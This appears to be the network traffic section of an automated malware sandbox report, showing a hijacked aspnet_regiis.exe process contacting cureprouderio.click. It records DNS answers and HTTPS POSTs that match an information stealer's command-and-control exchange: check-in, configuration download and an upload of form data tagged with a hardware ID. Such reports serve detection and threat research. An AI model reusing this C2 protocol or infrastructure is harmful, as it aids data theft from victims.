Jan 5, 2025 20:42:02.619606972 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.619770050 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.619802952 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.619970083 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.619997978 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.620013952 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.620026112 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.620212078 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.620239019 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.620264053 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.620415926 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.620445967 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.629105091 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.629288912 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.629308939 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.629334927 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.629349947 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.629385948 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.634601116 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:05.835055113 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:05.835143089 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:05.835199118 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:05.835355043 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:05.835367918 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:05.874202967 CET	49737	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:05.874241114 CET	443	49737	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:05.874320030 CET	49737	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:05.874579906 CET	49737	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:05.874594927 CET	443	49737	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:06.017940044 CET	49737	443	192.168.2.4	172.67.132.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 20:41:54.045515060 CET	59194	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:41:54.058430910 CET	53	59194	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 20:41:54.045515060 CET	192.168.2.4	1.1.1.1	0x624b	Standard query (0)	cureprouderio.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 20:41:54.058430910 CET	1.1.1.1	192.168.2.4	0x624b	No error (0)	cureprouderio.click		172.67.132.7	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:41:54.058430910 CET	1.1.1.1	192.168.2.4	0x624b	No error (0)	cureprouderio.click		104.21.4.114	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cureprouderio.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:41:54 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cureprouderio.click
2025-01-05 19:41:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 19:41:55 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:41:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pjmct79kdjgv0ensvl0prorstp; expires=Thu, 01 May 2025 13:28:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lX0cxD%2Fi3r9aYCMpbv5upAIUPbd8P8pNmbJq0n9wi8L0qKp1vwwaYLX1Hz5EdUYgp9lMemiVuJwjxDT%2F%2B01hg0jw%2FnRqZAkm0cAYbzolyNikRKpVvB62%2BK4Kv5GWdT9eHgX3sL3m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2d0bb407298-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1794&rtt_var=689&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=910&delivery_rate=1570736&cwnd=182&unsent_bytes=0&cid=f69016bbacb289ca&ts=519&x=0"
2025-01-05 19:41:55 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 19:41:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:41:55 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: cureprouderio.click
2025-01-05 19:41:55 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--gyfsshbyotsj&j=
2025-01-05 19:41:56 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:41:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g157uki4aocnqmu0nrlsrpg372; expires=Thu, 01 May 2025 13:28:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yw8hQ6DMn%2B1Q150UK2M9f3BMv3zA1F15xp0AaUcbBtA%2Brlxgn5nt1h5Qw5jKYOO4DR49GGsYFZkXFM20GynghcaL8lpDfcSAxOLc%2FGRNxaL4d6xlfrwgTFXqawKy%2FcuKh7xmIrn8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2d71fa8c459-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1660&rtt_var=639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=957&delivery_rate=1689814&cwnd=231&unsent_bytes=0&cid=2650ec8ba4f089df&ts=568&x=0"
2025-01-05 19:41:56 UTC	242	IN	Data Raw: 34 36 39 0d 0a 58 73 77 39 45 34 59 7a 6f 66 2b 2b 58 64 76 54 51 45 61 79 42 76 73 33 38 42 34 43 67 6d 74 5a 34 6d 66 55 69 4a 77 58 74 50 30 6c 37 6b 73 78 76 41 65 4e 33 63 30 34 2b 65 6b 30 4e 4d 64 6a 31 78 57 52 65 69 43 34 44 54 69 4f 46 4c 47 6b 76 6d 48 5a 33 32 53 71 58 48 2f 31 56 6f 33 64 32 79 58 35 36 52 73 39 6b 47 4f 56 46 63 6f 38 5a 2b 67 4a 4f 49 34 46 74 65 50 7a 5a 39 69 65 4e 71 42 61 65 2b 4e 51 78 5a 37 53 4d 4c 36 32 4a 53 66 59 61 4a 4a 61 6d 48 4d 67 72 6b 6b 38 6d 45 58 75 71 74 46 79 77 4a 77 54 72 55 35 34 70 45 36 4e 68 4a 77 34 74 66 46 36 5a 4e 4e 6a 6d 56 75 57 65 6d 6e 71 41 7a 47 47 42 4c 44 69 37 48 37 53 6c 54 61 75 57 58 72 70 57 64 47 54 32 44 65 31 73 43 38 6e 6b 43 72 5a 55 Data Ascii: 469Xsw9E4Yzof++XdvTQEayBvs38B4CgmtZ4mfUiJwXtP0l7ksxvAeN3c04+ek0NMdj1xWReiC4DTiOFLGkvmHZ32SqXH/1Vo3d2yX56Rs9kGOVFco8Z+gJOI4FtePzZ9ieNqBae+NQxZ7SML62JSfYaJJamHMgrkk8mEXuqtFywJwTrU54pE6NhJw4tfF6ZNNjmVuWemnqAzGGBLDi7H7SlTauWXrpWdGT2De1sC8nkCrZU
2025-01-05 19:41:56 UTC	894	IN	Data Raw: 6f 6f 38 4f 4b 42 61 43 59 4d 55 70 2f 2f 7a 5a 64 44 66 49 2b 42 47 4d 65 4e 64 67 38 57 63 4e 37 57 2f 4a 79 66 66 59 35 68 56 67 48 4e 67 34 77 45 7a 68 41 2b 35 35 66 46 37 33 4a 67 30 70 31 68 2b 34 31 6e 46 6b 74 39 2f 39 2f 45 6c 50 4a 41 38 32 58 57 43 66 32 50 30 42 43 72 41 47 76 6a 7a 76 6e 4c 61 33 32 54 75 57 58 2f 6c 58 4d 4f 50 31 44 53 79 74 44 41 76 32 57 6d 55 56 5a 39 32 62 2b 4d 4a 50 49 6f 50 75 65 44 36 65 4e 75 5a 50 4b 34 66 50 36 52 57 32 39 32 45 66 35 71 30 4d 69 50 63 63 74 74 76 30 6d 4d 75 2b 55 6b 38 6a 45 58 75 71 76 5a 77 31 5a 77 33 6f 56 78 35 37 30 50 44 6a 39 6f 79 76 4b 4d 6b 49 64 35 75 6d 6b 65 59 63 6d 62 6a 41 44 43 4a 41 4c 48 75 76 6a 75 57 6d 43 54 75 42 7a 48 46 58 4d 69 52 31 69 69 35 38 54 31 71 79 53 53 65 Data Ascii: oo8OKBaCYMUp//zZdDfI+BGMeNdg8WcN7W/JyffY5hVgHNg4wEzhA+55fF73Jg0p1h+41nFkt9/9/ElPJA82XWCf2P0BCrAGvjzvnLa32TuWX/lXMOP1DSytDAv2WmUVZ92b+MJPIoPueD6eNuZPK4fP6RW292Ef5q0MiPccttv0mMu+Uk8jEXuqvZw1Zw3oVx570PDj9oyvKMkId5umkeYcmbjADCJALHuvjuWmCTuBzHFXMiR1ii58T1qySSe
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 33 39 65 39 0d 0a 57 65 58 57 35 56 71 49 50 39 48 49 73 41 43 75 71 71 6d 4e 64 6d 51 4d 36 5a 66 63 4f 42 63 78 35 7a 52 4d 37 43 79 4c 69 6a 59 61 5a 56 52 6e 58 52 6f 34 77 45 70 6a 67 75 77 37 50 35 77 6c 74 46 38 71 55 63 78 76 42 48 6e 6b 38 73 72 73 76 4d 58 4a 39 35 71 6e 6b 50 53 59 79 37 35 53 54 79 4d 52 65 36 71 38 48 6a 64 6b 7a 75 6e 58 6e 4c 6b 57 38 32 53 31 6a 65 78 73 53 38 6c 32 32 79 66 57 4a 6c 7a 62 2b 63 42 4f 49 77 41 75 2b 6d 2b 4f 35 61 59 4a 4f 34 48 4d 63 46 66 77 49 7a 4e 66 59 79 79 4c 43 72 58 63 74 6c 4b 33 47 55 67 35 77 56 37 32 45 57 38 37 66 6c 78 32 35 55 2f 71 6c 74 38 36 31 6a 4b 6c 4d 34 31 74 62 38 77 4b 64 70 68 6c 31 6d 58 63 32 44 68 43 44 57 4b 44 76 61 6b 76 6e 4c 4f 33 32 54 75 63 48 7a 30 51 38 6d 57 7a 58 Data Ascii: 39e9WeXW5VqIP9HIsACuqqmNdmQM6ZfcOBcx5zRM7CyLijYaZVRnXRo4wEpjguw7P5wltF8qUcxvBHnk8srsvMXJ95qnkPSYy75STyMRe6q8HjdkzunXnLkW82S1jexsS8l22yfWJlzb+cBOIwAu+m+O5aYJO4HMcFfwIzNfYyyLCrXctlK3GUg5wV72EW87flx25U/qlt861jKlM41tb8wKdphl1mXc2DhCDWKDvakvnLO32TucHz0Q8mWzX
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 50 4a 41 38 32 58 71 52 61 6d 71 67 46 6e 57 5a 52 62 48 6d 76 69 32 57 6c 54 43 71 58 48 33 74 58 63 36 63 32 44 69 30 74 53 49 69 31 6d 47 59 58 70 70 77 62 2b 6f 46 50 34 77 4d 73 4f 62 39 64 74 44 66 63 75 35 59 61 61 51 4a 67 37 7a 52 4e 4c 57 78 49 54 58 58 4a 4e 63 56 6e 48 70 67 6f 46 45 74 6b 42 4b 78 39 62 42 73 6c 70 67 77 37 67 63 78 37 6b 50 47 6b 39 67 31 76 4c 55 75 4c 74 42 68 69 31 32 55 65 32 7a 6f 44 44 53 47 41 4c 76 74 39 58 62 45 6a 54 2b 71 55 58 32 6b 48 34 4f 61 78 48 2f 68 38 51 63 7a 30 33 53 66 56 74 4a 6a 4c 76 6c 4a 50 49 78 46 37 71 72 2b 65 39 71 55 4f 36 56 55 64 65 42 52 7a 70 62 53 4d 62 43 39 4b 69 6a 58 64 70 52 51 6d 6e 5a 70 35 51 55 32 67 78 65 31 36 37 34 37 6c 70 67 6b 37 67 63 78 77 32 4c 30 76 70 77 67 39 36 68 Data Ascii: PJA82XqRamqgFnWZRbHmvi2WlTCqXH3tXc6c2Di0tSIi1mGYXppwb+oFP4wMsOb9dtDfcu5YaaQJg7zRNLWxITXXJNcVnHpgoFEtkBKx9bBslpgw7gcx7kPGk9g1vLUuLtBhi12Ue2zoDDSGALvt9XbEjT+qUX2kH4OaxH/h8Qcz03SfVtJjLvlJPIxF7qr+e9qUO6VUdeBRzpbSMbC9KijXdpRQmnZp5QU2gxe16747lpgk7gcxw2L0vpwg96h
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 4d 45 56 76 6e 39 76 36 30 6b 6b 7a 68 7a 32 37 66 49 31 6a 74 38 37 70 6c 64 2f 35 31 66 49 6b 64 41 2b 73 4c 63 6e 4c 4e 64 72 6e 6c 79 56 66 47 62 79 44 6a 61 4a 42 62 33 6a 39 48 48 58 6c 48 7a 67 48 33 62 38 45 5a 76 64 37 6a 69 76 6f 53 46 6b 7a 79 71 41 46 5a 56 77 49 4c 68 4a 4e 70 49 45 73 2f 6a 36 65 74 32 4e 4e 36 68 66 64 50 5a 57 7a 35 66 54 50 4c 47 38 49 53 7a 43 5a 4a 52 56 67 47 35 6d 36 77 64 37 7a 6b 57 78 38 72 34 74 6c 71 34 72 70 52 39 75 71 6b 69 44 6d 74 42 2f 34 66 45 68 4c 74 31 71 69 31 47 55 64 32 50 75 41 54 36 49 41 62 7a 6e 38 58 37 63 6c 6a 53 75 55 48 54 73 57 73 57 54 33 54 6d 31 76 47 4a 71 6b 47 4f 42 46 63 6f 38 52 2f 6f 45 50 5a 63 55 67 2b 33 2b 4a 4a 61 41 63 72 63 66 64 75 67 52 6d 39 33 52 4d 37 4f 38 4a 79 44 59 Data Ascii: MEVvn9v60kkzhz27fI1jt87pld/51fIkdA+sLcnLNdrnlyVfGbyDjaJBb3j9HHXlHzgH3b8EZvd7jivoSFkzyqAFZVwILhJNpIEs/j6et2NN6hfdPZWz5fTPLG8ISzCZJRVgG5m6wd7zkWx8r4tlq4rpR9uqkiDmtB/4fEhLt1qi1GUd2PuAT6IAbzn8X7cljSuUHTsWsWT3Tm1vGJqkGOBFco8R/oEPZcUg+3+JJaAcrcfdugRm93RM7O8JyDY
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 78 6c 49 4f 63 46 65 39 68 46 75 4f 66 34 64 4e 65 58 4e 4b 35 5a 65 2b 42 53 79 70 37 62 4e 72 2b 36 49 53 37 66 59 35 39 52 6b 6e 64 6e 37 67 38 2b 69 77 7a 32 70 4c 35 79 7a 74 39 6b 37 6e 6c 53 39 6b 50 78 6b 39 38 6b 2b 61 35 73 50 5a 42 6a 6c 52 58 4b 50 47 76 6f 42 69 6d 46 44 4c 37 75 39 33 58 53 6c 54 47 70 58 33 54 70 56 4d 65 54 32 44 69 35 76 53 30 6a 32 47 75 64 56 5a 30 38 4c 71 41 4f 49 38 42 64 39 73 72 31 59 2f 65 52 4e 37 77 66 62 71 70 49 67 35 72 51 66 2b 48 78 4c 43 33 52 62 4a 64 5a 6d 6e 68 79 34 41 49 79 6a 77 53 35 36 76 31 30 33 4a 63 75 71 46 39 36 37 46 62 4c 6d 64 49 74 75 4c 35 69 61 70 42 6a 67 52 58 4b 50 46 48 32 44 6a 79 50 52 35 2f 74 35 58 54 63 6e 44 65 69 48 32 36 71 53 49 4f 61 30 48 2f 68 38 53 38 6f 33 57 43 4c 57 Data Ascii: xlIOcFe9hFuOf4dNeXNK5Ze+BSyp7bNr+6IS7fY59Rkndn7g8+iwz2pL5yzt9k7nlS9kPxk98k+a5sPZBjlRXKPGvoBimFDL7u93XSlTGpX3TpVMeT2Di5vS0j2GudVZ08LqAOI8Bd9sr1Y/eRN7wfbqpIg5rQf+HxLC3RbJdZmnhy4AIyjwS56v103JcuqF967FbLmdItuL5iapBjgRXKPFH2DjyPR5/t5XTcnDeiH26qSIOa0H/h8S8o3WCLW
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 67 55 58 75 4c 43 37 50 72 38 6e 2f 52 6b 53 36 76 56 58 33 6c 56 73 53 57 7a 6a 53 72 75 69 6f 6e 33 6d 79 51 56 5a 78 38 59 65 30 4a 65 38 35 46 73 66 4b 2b 4c 5a 61 36 48 37 6c 4a 65 36 5a 79 31 49 76 57 4f 4c 57 6e 4b 53 58 54 63 70 52 46 30 6a 49 67 38 51 34 71 77 46 32 67 2b 75 6c 79 79 64 45 6c 37 6c 68 39 70 41 6d 44 6c 74 4d 78 74 4c 6f 6d 4c 64 56 73 6d 6c 43 58 64 6d 7a 73 43 44 4f 4a 44 37 50 76 2b 48 2f 56 6b 54 4f 76 55 33 58 74 58 38 72 64 6b 6e 2b 2b 71 57 4a 38 6b 46 4b 4a 55 6f 70 78 63 4b 49 37 4f 4a 45 55 6f 2b 66 75 63 35 53 77 50 36 4a 63 64 4f 4e 42 67 34 4b 53 4a 76 6d 32 4c 6d 53 49 4a 4a 6c 52 6e 6e 39 6e 37 67 59 32 6a 77 4b 39 35 66 52 37 78 4a 41 35 70 6c 4e 35 36 55 50 4a 6c 38 34 32 73 4c 77 73 4c 4d 4a 6e 32 52 76 53 65 33 Data Ascii: gUXuLC7Pr8n/RkS6vVX3lVsSWzjSruion3myQVZx8Ye0Je85FsfK+LZa6H7lJe6Zy1IvWOLWnKSXTcpRF0jIg8Q4qwF2g+ulyydEl7lh9pAmDltMxtLomLdVsmlCXdmzsCDOJD7Pv+H/VkTOvU3XtX8rdkn++qWJ8kFKJUopxcKI7OJEUo+fuc5SwP6JcdONBg4KSJvm2LmSIJJlRnn9n7gY2jwK95fR7xJA5plN56UPJl842sLwsLMJn2RvSe3
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 75 55 58 2b 71 73 45 37 6c 6f 64 38 39 68 39 45 35 31 2f 4e 6d 73 6f 75 39 4a 41 76 4c 39 78 70 6c 6c 37 53 4d 69 44 6d 53 57 50 51 53 2f 62 75 37 7a 57 4f 7a 32 37 31 43 69 4b 7a 41 5a 47 43 6b 69 62 35 70 32 4a 38 67 69 72 5a 52 39 49 6b 49 4b 63 4b 4b 5a 49 44 74 66 7a 39 4d 75 69 68 48 37 6c 4a 65 2f 38 54 35 5a 72 4e 4e 71 2b 38 4d 42 72 75 53 70 52 55 6b 58 49 69 30 52 38 32 6b 41 61 7a 37 63 42 4c 32 4a 67 6f 71 56 46 33 35 42 47 4e 33 64 4e 2f 34 59 68 69 62 4a 42 62 31 78 57 4b 50 44 69 67 50 44 69 4f 43 37 48 38 37 7a 6a 31 69 43 71 6b 52 44 50 43 56 74 4b 55 79 6a 4b 72 38 57 78 6b 31 69 54 42 42 64 77 38 5a 50 46 4a 59 39 42 58 37 62 2b 74 49 6f 62 4e 49 2b 42 47 4d 66 49 52 6d 38 2b 53 66 36 76 78 65 6d 53 58 5a 34 74 48 6c 48 39 32 34 30 34 Data Ascii: uUX+qsE7lod89h9E51/Nmsou9JAvL9xpll7SMiDmSWPQS/bu7zWOz271CiKzAZGCkib5p2J8girZR9IkIKcKKZIDtfz9MuihH7lJe/8T5ZrNNq+8MBruSpRUkXIi0R82kAaz7cBL2JgoqVF35BGN3dN/4YhibJBb1xWKPDigPDiOC7H87zj1iCqkRDPCVtKUyjKr8Wxk1iTBBdw8ZPFJY9BX7b+tIobNI+BGMfIRm8+Sf6vxemSXZ4tHlH92404
2025-01-05 19:41:56 UTC	1369	IN	Data Raw: 76 75 2b 4c 59 62 4e 5a 2f 73 4d 4a 72 51 44 33 4e 50 46 66 36 2f 78 65 6e 61 65 4a 49 73 56 79 6a 77 6e 34 78 73 70 68 67 61 67 36 62 6c 4c 36 4b 6f 2f 6f 46 46 32 38 6d 54 41 6a 4e 38 2f 73 6f 38 63 42 64 35 76 6e 6c 6d 45 51 6c 37 56 43 6a 57 4f 41 71 44 37 76 6a 75 57 6b 48 7a 32 5a 6a 47 73 45 66 7a 54 6e 43 66 35 36 57 49 52 30 32 71 58 55 6f 52 74 4c 64 55 4b 4b 6f 4d 46 76 61 71 77 4e 64 44 66 5a 50 77 52 4d 65 42 41 67 38 57 4d 62 65 4c 6b 63 58 4f 41 4e 6f 59 62 69 7a 78 32 6f 46 46 70 7a 6b 57 6b 71 71 59 31 6b 5a 77 75 76 46 6c 79 38 6c 4b 45 6f 2b 49 5a 75 72 59 6b 4a 39 35 7a 69 42 65 39 66 32 76 73 42 54 79 57 4f 34 6a 2f 2f 58 76 59 6d 43 71 2f 48 7a 2b 6b 58 6f 50 46 35 58 2b 6f 75 79 56 6f 6d 43 69 49 52 70 78 33 64 75 64 4a 42 4d 35 46 Data Ascii: vu+LYbNZ/sMJrQD3NPFf6/xenaeJIsVyjwn4xsphgag6blL6Ko/oFF28mTAjN8/so8cBd5vnlmEQl7VCjWOAqD7vjuWkHz2ZjGsEfzTnCf56WIR02qXUoRtLdUKKoMFvaqwNdDfZPwRMeBAg8WMbeLkcXOANoYbizx2oFFpzkWkqqY1kZwuvFly8lKEo+IZurYkJ95ziBe9f2vsBTyWO4j//XvYmCq/Hz+kXoPF5X+ouyVomCiIRpx3dudJBM5F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:41:56 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B19UGHS7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: cureprouderio.click
2025-01-05 19:41:56 UTC	15331	OUT	Data Raw: 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --B19UGHS7Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--B19UGHS7Content-Disposition: form-data; name="pid"2--B19UGHS7Content-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--B19UGHS7Content-D
2025-01-05 19:41:56 UTC	2779	OUT	Data Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
2025-01-05 19:41:57 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:41:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8b891vm15uj4pdaijdq761tln3; expires=Thu, 01 May 2025 13:28:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRmV5bUhN1i%2B13ABXsieDG2nFLE6BTiEgafmaUWseDFqz4IkeL5epHAwHrVosdQY0rbBF2cKyMbdb%2BXe50KqdEaQV9sv8AK4mGLzYhFzy3DkGw4CbNIYwtOnl7xFWawkoFXny7oF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2de9df24326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1724&rtt_var=650&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19065&delivery_rate=1677197&cwnd=178&unsent_bytes=0&cid=7067a8e5c6b5c206&ts=987&x=0"
2025-01-05 19:41:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:41:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:41:58 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EPPY8583NRMLK1Y9P1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8791 Host: cureprouderio.click
